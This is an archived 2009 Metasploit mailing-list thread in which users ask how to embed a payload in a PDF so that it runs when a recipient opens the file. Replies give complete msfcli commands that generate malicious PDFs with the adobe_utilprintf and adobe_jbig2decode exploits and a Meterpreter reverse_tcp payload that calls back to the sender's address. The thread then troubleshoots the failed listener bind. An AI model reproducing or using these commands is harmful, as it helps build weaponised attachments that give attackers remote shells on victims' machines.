Metasploit mailing list archives

is it possible to attach metasploit payloads withpdf


From: natron at invisibledenizen.org (Natron)
Date: Sun, 29 Mar 2009 15:53:25 -0500

Are you running it as root? You can't bind to 443 on a 'normal' account.

N

On Mar 29, 2009, at 3:14 PM, wfdawson at bellsouth.net wrote:

 Hi,

I tried your suggestion.  I have a NAT'ed connection to the Internet  
where connections to my external address are mapped one-to-one to my  
internal address.  With the following:

./msfcli exploit/windows/fileformat/adobe_jbig2decode  
filename=test2.pdf payload=windows/meterpreter/reverse_tcp  
LHOST=x.x.x.x LPORT=443 E

...where x.x.x.x is my actual Internet visible IP address, I  
obtained the following response:

[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[-] Bind failed on 0.0.0.0
[*] Handler binding to LHOST x.x.x.x
[-] Bind failed on x.x.x.x
[-] Exploit failed: Cannot assign requested address - bind(2)

Is there a way to make this work in my situation?


-------------- Original message from Mirko Iodice  
<m.iodice at gmail.com>: --------------


try:

./msfcli exploit/windows/fileformat/adobe_utilprintf
filename=document.pdf payload=windows/meterpreter/reverse_tcp
lhost=x.x.x.x lport=5555 E

2009/3/28 Abhishek Kumar :
hi list,

yesterday i was working around attaching a meterpreter reverse_tcp
payload to a MS word document.
It was simple to do because msfpayload provides payloads in VBA  
format.

Now,the question is...
is there anything available for pdf files ? > can we embed our  
payloads with pdf and then wait for the user to click on it
??

regards
abhi
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




--
Mirko Iodice
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: